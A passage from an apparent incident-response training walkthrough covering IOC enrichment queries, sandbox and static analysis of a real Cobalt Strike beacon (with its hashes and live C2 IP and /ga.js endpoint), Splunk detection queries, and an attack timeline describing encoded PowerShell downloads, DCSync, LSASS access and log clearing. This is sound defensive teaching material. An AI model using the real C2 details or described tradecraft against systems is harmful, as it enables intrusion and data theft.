{{VT_KEY}}<br><br>###<br><br>### VT — CFO phishing delivery domain<br>GET https://www.virustotal.com/api/v3/domains/globalcontracts-secure.net<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — svchost32.exe binary hash<br>GET https://www.virustotal.com/api/v3/files/3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Imphash pivot (find related samples compiled from same source)<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=imphash%3A3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d<br>x-apikey: {{VT_KEY}}<br><br># ── Shodan ──────────────────────────────────────────────────────────<br><br>### Shodan — Primary C2 IP (ports, services, hosting org)<br>GET https://api.shodan.io/shodan/host/203.0.113.87?key={{SHODAN_KEY}}<br><br>###<br><br>### Shodan — Exfil IP<br>GET https://api.shodan.io/shodan/host/198.51.100.44?key={{SHODAN_KEY}}<br><br># ── Certificate Transparency ─────────────────────────────────────────<br><br>### crt.sh — Find all domains using certs issued to primary C2 IP<br>GET https://crt.sh/?q=203.0.113.87&amp;output=json<br><br>###<br><br>### crt.sh — Cert history for primary C2 domain<br>GET https://crt.sh/?q=telemetry-cdn-services.biz&amp;output=json<br><br># ── RDAP ────────────────────────────────────────────────────────────<br><br>### RDAP — AiTM phishing domain registration date<br>GET https://rdap.org/domain/mfa-lifetechpharma.com<br><br>###<br><br>### RDAP — CFO phishing delivery domain<br>GET https://rdap.org/domain/globalcontracts-secure.net<br><br># ── Passive DNS (no key required) ───────────────────────────────────<br><br>### VT Passive DNS — historical resolutions for primary C2 IP (uses existing VT key)<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT Passive DNS — historical resolutions for exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### RIPEstat — DNS history for primary C2 IP (no key, no rate limit for training)<br>GET https://stat.ripe.net/data/dns-history/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info: ASN, prefix, country for C2 IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info for exfil IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=198.51.100.44<br><br># ── WHOIS / RDAP (no key required) ──────────────────────────────────<br><br>### ARIN RDAP — IP block owner, ASN, abuse contact for C2 IP<br>GET https://rdap.arin.net/registry/ip/203.0.113.87<br><br>###<br><br>### ARIN RDAP — IP block owner for exfil IP<br>GET https://rdap.arin.net/registry/ip/198.51.100.44<br><br>###<br><br>### ARIN RDAP — IP block owner for attacker VPN source<br>GET https://rdap.arin.net/registry/ip/185.220.101.47<br><br>###<br><br>### RDAP — C2 domain registration: registrar, date, registrant<br>GET https://rdap.org/domain/telemetry-cdn-services.biz<br><br>###<br><br>### RDAP — Exfil domain registration<br>GET https://rdap.org/domain/sys-update-cdn.net</pre><p><strong>Using the response pane:</strong></p><p>After clicking <strong>Send Request</strong> on the VT IP block, the right pane shows the full JSON response. Use Ctrl+F in the response pane to find:</p><ul><li>malicious → "malicious": 12</li><li>tags → ["C2", "malware"]</li><li>as_owner → "Hostwinds LLC"</li></ul><p>For the crt.sh response, Ctrl+F → name_value to see all co-hosted domains. cdn-telemetry-update.biz and windows-cdn-service.net appear — new IOCs not yet seen in the org's DNS logs. Switch to dns-queries.csv and Ctrl+F to check immediately.</p><p><strong>Commit the </strong><strong>.http file — it is a reproducible audit trail of every enrichment query:</strong></p><pre>git add 03-analysis/ioc-queries.http<br>git commit -m "PROJ-2024-001: IOC enrichment queries — VT, Shodan, crt.sh, RDAP"</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2; VT: 12 malicious detections, ASN: Hostwinds LLC</li><li><strong>IP</strong> 198.51.100.44 — Secondary C2 / exfil endpoint</li><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Primary C2 domain</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; registered 2024-10-18</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Domain</strong> cdn-telemetry-update.biz — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Domain</strong> windows-cdn-service.net — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Hash (SHA256)</strong> 3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e — svchost32.exe dropper</li><li><strong>Hash (imphash)</strong> 3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d — Pivot on VT to find related samples</li></ul><h4>11. Sandbox Analysis — Submit the Binary</h4><blockquote>Real Cobalt Strike sample used in Steps 11–12 All IPs, domains, and hashes elsewhere in this walkthrough are <strong>synthetic</strong> — invented for training and not queryable on threat intel platforms. Steps 11 and 12 are the exception: they use a <strong>real Cobalt Strike beacon</strong> (trojan.remusstealer/cobalt, 48/75 detections on VirusTotal, SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9) so you can practice sandbox submission and binary analysis against a file with genuine behavior. The C2 IP, HTTP profile, and PE metadata in these two steps reflect the real sample. All other scenario values (log IPs, exfil IPs, domains) remain fictional.</blockquote><p>Submit svchost32.exe (recovered via CrowdStrike RTR) to a sandbox. ANY.RUN is the recommended choice for training — it is interactive and lets you watch execution in real time.</p><p><strong>Submission (ANY.RUN):</strong></p><ol><li>Navigate to <a href="https://app.any.run/">app.any.run</a> → <strong>New Task</strong> → <strong>Upload</strong></li><li>Upload svchost32.exe (SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9)</li><li>Environment: <strong>Windows 10 x64</strong>, <strong>User mode</strong> (realistic CFO context)</li><li>Network mode: <strong>Real with IDS</strong> — this beacon makes live HTTPS connections</li><li>Timeout: <strong>120 seconds</strong> — beacon contacts C2 within the first minute</li><li>Click <strong>Run</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WYRLofzCq0I_GY_w7ozZzw.png"></figure><p><strong>Download the report to VS Code:</strong></p><p>After execution completes, click <strong>Export</strong> → <strong>JSON</strong> in ANY.RUN. Save it as:</p><pre>03-analysis/sandbox-svchost32-anyrun.json</pre><p><strong>Open in VS Code:</strong> press Shift+Alt+F to format. Use Ctrl+Shift+O (Outline) to navigate, Ctrl+F to search:</p><p>Search term What you find<br>destination_ip91.211.251.245 — real C2 IP, port 443<br>urlhttps://91.211.251.245/ga.js — Malleable C2 profile mimicking Google AnalyticsCookieBase64-encoded beacon metadata in the HTTP Cookie header<br>User-AgentMozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS UA string<br>ProxyServerBeacon installs proxy settings pointing to C2<br>long-sleepsVT tag — beacon sleeps between check-ins (configurable interval)</p><p><strong>The Cobalt Strike Malleable C2 profile:</strong> the beacon GETs /ga.js — a path that mimics Google Analytics JavaScript. The Cookie header carries AES-encrypted metadata (victim hostname, PID, username) base64-encoded. The response body delivers shellcode or tasks. A defender looking only at the URL sees legitimate-looking traffic; the anomaly is the 443 connection to a non-Google IP.</p><p>Add the C2 IP to ioc-queries.http and click <strong>Send Request</strong> on the VT and Shodan blocks to pivot immediately.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon; 48/75 VT detections</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077 — same sample</li><li><strong>IP</strong> 91.211.251.245:443 — real C2 server; HTTPS; confirmed in sandbox network traffic</li><li><strong>URL</strong> https://91.211.251.245/ga.js — Malleable C2 endpoint; mimics Google Analytics</li><li><strong>Indicator</strong> Cookie-encoded beacon — AES-encrypted victim metadata in HTTP Cookie header</li><li><strong>Indicator</strong> long-sleeps — beacon interval; time between C2 check-ins</li></ul><h4>12. Static Binary Analysis — Hex Editor + Terminal</h4><p><strong>Open the binary in VS Code Hex Editor:</strong></p><p>In VS Code Explorer, right-click svchost32.exe → <strong>Open With</strong> → <strong>Hex Editor</strong></p><p>The file opens as a hex+ASCII dual-pane view. The ASCII column on the right makes string hunting visual — scroll through it and strings like /ga.js and Mozilla/4.0 are readable directly without running strings.</p><p><strong>Navigate to the PE timestamp:</strong></p><p>Press Ctrl+G → type 3C → Enter. This is the e_lfanew field (PE header pointer). Read the 4-byte little-endian value, convert to decimal — that is the offset to the PE signature (PE\0\0). Go to that offset + 8 for the TimeDateStamp field.</p><p>For precise extraction, split the screen: keep Hex Editor on the left, open the integrated terminal on the right:</p><pre>python3 -c "<br>import pefile, datetime, os<br>pe = pefile.PE('svchost32.exe')<br>ts = pe.FILE_HEADER.TimeDateStamp<br>print(f'Compile timestamp : {datetime.datetime.fromtimestamp(ts, datetime.UTC)} UTC')<br>print(f'File size on disk : {os.path.getsize(\"svchost32.exe\"):,} bytes')<br>print(f'PE SizeOfImage    : {pe.OPTIONAL_HEADER.SizeOfImage:,} bytes')<br>overlay = os.path.getsize('svchost32.exe') - pe.OPTIONAL_HEADER.SizeOfImage<br>if overlay &gt; 0:<br>    print(f'Overlay detected  : {overlay:,} bytes after PE end')<br>print(f'Architecture      : {\"x64\" if pe.FILE_HEADER.Machine == 0x8664 else \"x86\"}')<br>"</pre><p>Output:</p><pre>Compile timestamp : 2026-05-15 13:55:55 UTC<br>File size on disk : 783,320 bytes<br>Overlay detected  : present<br>Architecture      : x64</pre><p>The PE timestamp (2026-05-15) is plausible and recent — this binary was freshly compiled, not timestomped. The presence of an <strong>overlay</strong> (data appended after the PE image end) is a Cobalt Strike loader signature: the encrypted beacon shellcode is stored in the overlay and unpacked at runtime.</p><p><strong>Extract C2 strings:</strong></p><pre>strings -n 8 svchost32.exe | grep -E "(https?://|/ga\.js|Mozilla|Cookie|User-Agent|Cache-Control)"</pre><p>Output includes:</p><pre>/ga.js<br>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)<br>Cache-Control: no-cache</pre><p>The /ga.js path and the MSIE 8.0 User-Agent are configuration strings baked into the Cobalt Strike beacon's Malleable C2 profile at compile time. Any sample sharing these exact strings was built from the same profile.</p><p><strong>Check imports — Cobalt Strike loaders minimise their import table:</strong></p><pre>python3 -c "<br>import pefile<br>pe = pefile.PE('svchost32.exe')<br>print(f'Architecture: {hex(pe.FILE_HEADER.Machine)}')<br>if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):<br>    for lib in pe.DIRECTORY_ENTRY_IMPORT:<br>        fns = [i.name.decode() if i.name else f'ord_{i.ordinal}' for i in lib.imports]<br>        print(f'{lib.dll.decode()}: {fns}')<br>else:<br>    print('No standard import table — uses dynamic API resolution (common in CS loaders)')<br>"</pre><p>A Cobalt Strike loader typically has a minimal or absent import table — it resolves APIs at runtime using LoadLibrary/GetProcAddress or custom hash-walking to avoid static analysis. If the import table is empty, that itself is the finding.</p><p><strong>Pivot on the Malleable C2 profile strings</strong> — search VT for other samples using the same profile:</p><p>Add to ioc-queries.http:</p><pre>### VT — search for samples sharing the same Malleable C2 User-Agent string<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=content%3A%22MSIE+8.0%22+content%3A%22%2Fga.js%22+type%3Apeexe<br>x-apikey: {{VT_KEY}}</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077</li><li><strong>IP</strong> 91.211.251.245 — C2 server; confirmed in binary strings and sandbox network traffic</li><li><strong>URL pattern</strong> /ga.js — Malleable C2 endpoint; Google Analytics impersonation</li><li><strong>String</strong> Mozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS User-Agent; pivot on VT content search</li><li><strong>Indicator</strong> Overlay section — encrypted shellcode stored after PE image end; Cobalt Strike loader signature</li><li><strong>Indicator</strong> Minimal import table — dynamic API resolution; evades import-based static detection13. Infrastructure Pivot — REST Client + Global Search</li></ul><h4>13. Infrastructure Pivot — REST Client + Global Search</h4><p>The ioc-queries.http file already contains the Shodan, crt.sh, and RDAP blocks. Click through them.</p><p><strong>For the crt.sh response:</strong> press Ctrl+F in the response pane, search name_value. Two new domains appear: cdn-telemetry-update.biz and windows-cdn-service.net.</p><p><strong>Immediately pivot in VS Code global search:</strong></p><p>Press Ctrl+Shift+F, type cdn-telemetry-update:</p><pre>palo-alto/dns-queries.csv  →  (no results)</pre><p>Not in the org’s DNS logs — but add both new domains to the IOC list in case they appear in a broader hunt.</p><p><strong>For the RDAP response</strong> (AiTM domain): Ctrl+F → registration → date 2024-10-18. The phishing email was sent 4 days later. Targeted, purpose-built infrastructure.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> cdn-telemetry-update.biz — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Domain</strong> windows-cdn-service.net — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Date</strong> 2024-10-18 — Registration date of mfa-lifetechpharma.com; 4 days before phishing</li></ul><h4>14. Splunk Correlation (SIEM Validation)</h4><p>Load the evidence into Splunk from the VS Code integrated terminal to validate that the Sigma rules fire on the real evidence:</p><pre>/opt/splunk/bin/splunk add oneshot sysmon/WS-CFO-01-sysmon.jsonl \<br>  -sourcetype sysmon_json -index endpoint -host WS-CFO-01<br>/opt/splunk/bin/splunk add oneshot windows-security/DC01-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host DC01<br>/opt/splunk/bin/splunk add oneshot windows-security/SERVER-RD-02-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host SERVER-RD-02<br>/opt/splunk/bin/splunk add oneshot palo-alto/ngfw-flows.csv \<br>  -sourcetype pan:traffic -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot palo-alto/dns-queries.csv \<br>  -sourcetype pan:dns -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot sql-audit/SERVER-RD-02-sql-audit.jsonl \<br>  -sourcetype mssql_audit -index database -host SERVER-RD-02</pre><p><strong>Query 1 — triage: C2 IPs across all indexes:</strong></p><pre>index=* (203.0.113.87 OR 198.51.100.44) earliest=-30d<br>| stats count by host, sourcetype, index<br>| sort -count</pre><p><strong>Query 2 — DCSync from non-DC (DET-002 validation):</strong></p><pre>index=wineventlog EventCode=4662<br>  ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"<br>| where NOT match(IpAddress, "^10\.10\.1\.(10|11)$")<br>| table _time, host, SubjectUserName, IpAddress, ObjectName, Properties</pre><p><strong>Query 3 — service account off-hours (DET-003 validation):</strong></p><pre>index=wineventlog EventCode=4624 LogonType=3<br>  TargetUserName=svc_backup<br>| eval hour=strftime(_time, "%H")<br>| where hour &lt; 6 OR hour &gt; 22<br>| table _time, host, TargetUserName, IpAddress | sort _time</pre><p><strong>Query 4 — exfil scope:</strong></p><pre>index=wineventlog EventCode=4663 ObjectName="*USPartner2024*"<br>| stats count as files_accessed, min(_time) as first, max(_time) as last by SubjectUserName, host</pre><p><strong>Query 5 — full 24-day timeline:</strong></p><pre>index=* earliest=2024-10-22 latest=2024-11-16<br>  (host=WS-IT-LEVI OR host=WS-CFO-01 OR host=SERVER-RD-02 OR host=DC01)<br>| eval summary=coalesce(Message, Statement, query, CommandLine, "event")<br>| table _time, host, sourcetype, summary | sort _time</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — SIEM-validated; C2 traffic confirmed across endpoint and network indexes</li><li><strong>IP</strong> 198.51.100.44 — SIEM-validated; exfil traffic confirmed across endpoint and network indexes</li><li><strong>Account</strong> svc_backup — DET-002: DCSync from 10.10.3.22 (non-DC); DET-003: off-hours logon</li><li><strong>File pattern</strong> USPartner2024* (47 files) — DET-004: bulk access by svc_backup on SERVER-RD-02</li><li><strong>Indicator</strong> Off-hours logon — EID 4624 / LogonType 3 outside 06:00–22:00 window</li></ul><h4>Commit all analysis artifacts</h4><pre>git add 03-analysis/<br>git commit -m "PROJ-2024-001: evidence analysis — VS Code investigation complete; REST Client queries, RBQL, binary hex analysis, DCSync confirmed, exfil 381MB corroborated in 3 sources"</pre><p>The timeline in Step R2 is now fully supported. Every event in the table has a source log opened in VS Code, a query or search that confirmed it, and a REST Client or terminal command a third party can replay independently.</p><h3>Step R2: Timeline — Two Paths, One Actor</h3><h4>1. Open the timeline file</h4><pre>nano 03-analysis/timeline/timeline.md</pre><p>The template has a header block and a markdown table. Fill the header first:</p><pre>Project: PROJ-2024-001<br>Analyst: [your name]<br>Last updated: 2024-11-15<br>Time range: 2024-10-18 – 2024-11-15<br>Evidence label key: CONFIRMED / CORROBORATED / INFERRED / HYPOTHESIZED / GAP</pre><p>Then add one row per event. Every row needs: timestamp (UTC), host, what happened, which log source you saw it in, an evidence label, and the ATT&amp;CK technique. If you do not have a technique yet, leave it blank and come back — do not skip the label.</p><h4>2. Add events in chronological order</h4><p>The timeline reveals what the CFO alert obscured: the breach started 24 days earlier through a completely different person.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*121cvZ2ZIHZLNAmQA78l9Q.png"></figure><ol><li><strong>2024–10–18 — External<br></strong>lifetechpharma-corp[.]eu registered as a typosquat domain.<br><strong>Source:</strong> OSINT<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1583.001<br><strong>Notes:</strong> Pre-attack infrastructure preparation.</li><li><strong>2024–10–22 11:23 — Exchange<br></strong>Phishing email sent to p.levi: <strong>“MFA Re-enrollment Required”</strong> with AiTM HTML attachment.<br><strong>Source:</strong> M365 ATP<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> ATP SCL=4, delivered; threshold was 5.</li><li><strong>2024–10–22 11:31 — WS-IT-LEVI<br></strong>Unknown activity — <strong>GAP-001 begins</strong>.<br><strong>Source:</strong> — <br><strong>Label:</strong> GAP<br><strong>ATT&amp;CK:</strong> — <br><strong>Notes:</strong> Sysmon forwarder stopped.</li><li><strong>2024–10–24 02:17 — Azure AD + VPN</strong>VPN login as p.levi from Istanbul, Turkey, using hosting/VPS ASN. No MFA challenge recorded. Session lasted 1h 12min.<br><strong>Source:</strong> Azure AD sign-in<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1557, T1133<br><strong>Notes:</strong> 4:17 AM local time; Paz Levi lives in Rehovot.</li><li><strong>2024–10–24 02:19 — DC01<br></strong>EID 4624: network logon for svc_backup from WS-IT-LEVI / 10.10.3.22. Service account used outside business hours.<br><strong>Source:</strong> Windows Security / Splunk<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1078.002<br><strong>Notes:</strong> svc_backup has Domain Admin rights.</li><li><strong>2024–10–25 03:41 — SERVER-FIN-01<br></strong>svc_backup accessed \\SERVER-FIN-01\\FinanceReports\\2024\\.<br><strong>Source:</strong> File share audit, partial<br><strong>Label:</strong> CORROBORATED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> Log incomplete — access timestamp only, not filenames.</li><li><strong>2024–11–01 09:14 — WS-IT-LEVI<br>GAP-001 ends.</strong> First DNS query to telemetry-cdn-services[.]biz resolving to 203.0.113.87. First C2 beacon from this host.<br><strong>Source:</strong> Palo Alto DNS<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1071.001<br><strong>Notes:</strong> Sysmon service and forwarder restarted at the same time — probable anti-forensics.</li><li><strong>2024–11–01 09:18 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB Type 3 logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Occurred four minutes after C2 reconnection.</li><li><strong>2024–11–06 02:09 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Off-hours access.</li><li><strong>2024–11–06 02:10–02:14 — SERVER-RD-02<br></strong>EID 4663 ×47: svc_backup accessed all 47 files in \\USPartner2024\\. Read activity occurred and modified timestamps were updated.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> Each file was individually accessed; timestamp modification suggests deliberate metadata manipulation.</li><li><strong>2024–11–06 02:14 — SERVER-RD-02<br></strong>EID 5156: outbound HTTPS from SERVER-RD-02 to external IP over port 443 during the file access window.<br><strong>Source:</strong> Windows Security + firewall<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1041<br><strong>Notes:</strong> Destination IP confirmed in Palo Alto NGFW log: 198.51.100.44; separate C2 from primary.</li><li><strong>2024–11–06 02:48 — DC01<br></strong>EID 4662: svc_backup requested DS-Replication-Get-Changes on DC01.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.006<br><strong>Notes:</strong> <strong>DCSync indicator.</strong> Pentest scope did not include DCSync. Pentest VLAN is 10.10.99.0/24; this event came from 10.10.3.22.</li><li><strong>2024–11–15 17:58 — Exchange<br></strong>Phishing email sent to m.cohen, the CFO: <strong>“Q4-2024 Licensing Agreement”</strong> with .xlsm attachment. SPF, DKIM, and DMARC all failed.<br><strong>Source:</strong> M365 Message Trace<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> <strong>Second entry point — 24 days after the first.</strong></li><li><strong>2024–11–15 18:42 — WS-CFO-01<br></strong>Outlook spawned PowerShell with -NonI -W Hidden -Enc, downloading a second-stage payload from 203.0.113.87.<br><strong>Source:</strong> CrowdStrike + Sysmon EID 1<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1059.001<br><strong>Notes:</strong> <strong>Triggering alert.</strong></li><li><strong>2024–11–15 18:46–20:52 — WS-CFO-01<br></strong>LSASS memory access observed via Sysmon EID 10 with GrantedAccess 0x1010. Persistence added via Registry Run Key and scheduled task. BITS downloaded a second-stage binary.<br><strong>Source:</strong> Sysmon EID 10/11/13, EID 4698<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.001, T1547.001, T1053.005, T1197<br><strong>Notes:</strong> svchost32.exe dropped to AppData\\Roaming.</li><li><strong>2024–11–15 20:52 — SERVER-FIN-01<br></strong>WMI lateral movement observed: WmiPrvSE spawned PowerShell with -Enc and a different base64 payload.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.003, T1059.001<br><strong>Notes:</strong> svc_finreport credentials used.</li><li><strong>2024–11–15 21:01 — SERVER-FIN-01<br></strong>Finance data staged: FR_2024_consolidated.zip created in C:\\Windows\\Temp\\.<br><strong>Source:</strong> CrowdStrike EID 11<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039, T1560<br><strong>Notes:</strong> 2.8 MB upload confirmed in firewall logs at 21:14.</li><li><strong>2024–11–15 21:14 — WS-CFO-01<br></strong>wevtutil.exe cl Security executed, partially clearing the Windows Security log.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1070.001<br><strong>Notes:</strong> Sysmon log remained intact because it was protected.</li></ol><p><strong>The evidence label system matters here.</strong> Event 12 (DCSync) is CONFIRMED — it exists in DC01’s Windows Security log, forwarded to Splunk, from an IP that is definitively WS-IT-LEVI and definitively not the pentest VLAN. That cannot be waved away as “possible pentest activity.” Event 6 (finance server access) is CORROBORATED — single source with incomplete log — and can only appear in the technical report with an explicit qualifier, not in the executive brief as a stated fact.</p><h4>3. Save and commit</h4><pre>git add 03-analysis/timeline/timeline.md<br>git commit -m "PROJ-2024-001: timeline — 18 events Oct 18–Nov 15, dual-path confirmed, GAP-001 bounds established"</pre><h3>Step R3: Claims Ledger — Every Assertion Traced to Evidence</h3><h4>1. Open the claims ledger</h4><pre>nano 03-analysis/claims/claims-ledger.md</pre><p>The template has a table with six columns: ID, Claim, Evidence, Confidence, Competing Hypotheses, PIR. Start with an empty row for each major assertion you identified in the timeline — then fill each one completely before moving to the next.</p><p><strong>For each row, answer these five questions before typing a word:</strong></p><ol><li>What is the exact assertion? (One sentence, falsifiable — could in principle be proven false)</li><li>Which file and line number is the evidence in? (Not “we saw in Splunk” — the actual log reference)</li><li>What confidence level and why? (High / Medium / Low / Insufficient — with explicit rationale)</li><li>What alternative explanations were considered — and why were they ruled out or left open?</li><li>Which PIR does this answer?</li></ol><p>If you cannot answer question 4, the claim is not ready to write. Think first.</p><h4>2. Fill in one claim per confirmed technique or PIR answer</h4><p>The claims ledger converts the timeline into auditable, falsifiable assertions. Each claim answers five questions: what, evidence, confidence, competing hypotheses, which PIR.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hBZhaHELHNyuzUeTbMbGvw.png"></figure><p><strong>CL-001 — Initial access via AiTM phishing against IT admin </strong><strong>p.levi</strong></p><ul><li><strong>Claim:</strong> Initial access was via AiTM phishing against IT admin p.levi on October 22, 2024.</li><li><strong>Evidence:</strong> M365 ATP log shows AiTM HTML lure delivered at 11:23 and opened at 11:31. VPN login from Istanbul occurred at 02:17 on October 24 with no MFA challenge, indicating likely stolen session token replay.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Credential purchase or insider activity cannot be fully ruled out without WS-IT-LEVI disk forensics, which is blocked by legal hold. However, the AiTM lure plus token replay pattern is more parsimonious.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-002 — Use of </strong><strong>svc_backup Domain Admin credentials to access formula files</strong></p><ul><li><strong>Claim:</strong> The adversary used svc_backup Domain Admin credentials to access SERVER-RD-02 and the formula files.</li><li><strong>Evidence:</strong> EID 4624 on SERVER-RD-02 shows svc_backup Type 3 logon from WS-IT-LEVI. EID 4663 occurred 47 times on formula files.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate backup operation is ruled out because backup jobs run from SERVER-WSUS-01 / 10.10.4.x, not from WS-IT-LEVI. The timestamp, 02:09 UTC, is outside the maintenance window.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-003 — Exfiltration of 47 formula files on November 6, 2024</strong></p><ul><li><strong>Claim:</strong> The 47 formula files in USPartner2024 were exfiltrated on November 6, 2024.</li><li><strong>Evidence:</strong> EID 4663 occurred 47 times, showing file access. EID 5156 shows outbound HTTPS from SERVER-RD-02 at the same time. Palo Alto NGFW flow shows 10.10.2.15 → 198.51.100.44:443, with 381 MB outbound between 02:14 and 02:19 UTC.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> File access for indexing or backup is ruled out because no backup job ran at this time. The 381 MB outbound volume matches the compressed formula package. The destination IP is not in the allowlist and resolves to a VPS hosting provider.</li><li><strong>PIR:</strong> PIR-001 — <strong>ANSWERED: YES</strong></li></ul><p><strong>CL-004 — DCSync executed via </strong><strong>svc_backup on November 6</strong></p><ul><li><strong>Claim:</strong> DCSync was executed via svc_backup Domain Admin rights on November 6 at 02:48 UTC.</li><li><strong>Evidence:</strong> DC01 EID 4662 shows DS-Replication-Get-Changes GUID from 10.10.3.22, which is WS-IT-LEVI. The subject username was svc_backup.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate AD replication is ruled out because the event originated from a workstation IP, not a domain controller. Authorized pentest scope explicitly excluded DCSync and used only 10.10.99.x IPs.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-005 — CFO path and IT admin path are same threat actor</strong></p><ul><li><strong>Claim:</strong> Path A, involving the CFO on November 15, and Path B, involving the IT admin on October 22, are attributable to the same threat actor.</li><li><strong>Evidence:</strong> Both svchost32.exe and UpdateHelper.dll share the same fake PE compile timestamp: 2018-04-09. The secondary C2 sys-update-cdn[.]net was hard-coded in the CFO implant and also used in SERVER-RD-02 DNS activity.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Coincidence would require two separate actors to target the same organization at the same time using a near-identical toolchain. This is extremely implausible.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-006 — Full domain compromise via DCSync</strong></p><ul><li><strong>Claim:</strong> The adversary achieved full domain compromise via DCSync. All Active Directory credentials must be treated as compromised.</li><li><strong>Evidence:</strong> CL-004 confirms DCSync activity. svc_backup held Domain Admin rights. DCSync requests included krbtgt and privileged account hashes.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> DCSync may have been partial or failed, but this cannot be confirmed without full DC01 log access. Treating the environment as fully compromised is the conservative and operationally correct response until disproven.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-003 is the pivotal claim.</strong> The US partner’s formulas are gone. That drives the PIR-001 answer and the entire notification timeline. CL-004 and CL-006 change the scope of remediation from “contain these three hosts” to “rotate all AD credentials, treat all 80 servers as potentially compromised.”</p><h4>3. Update 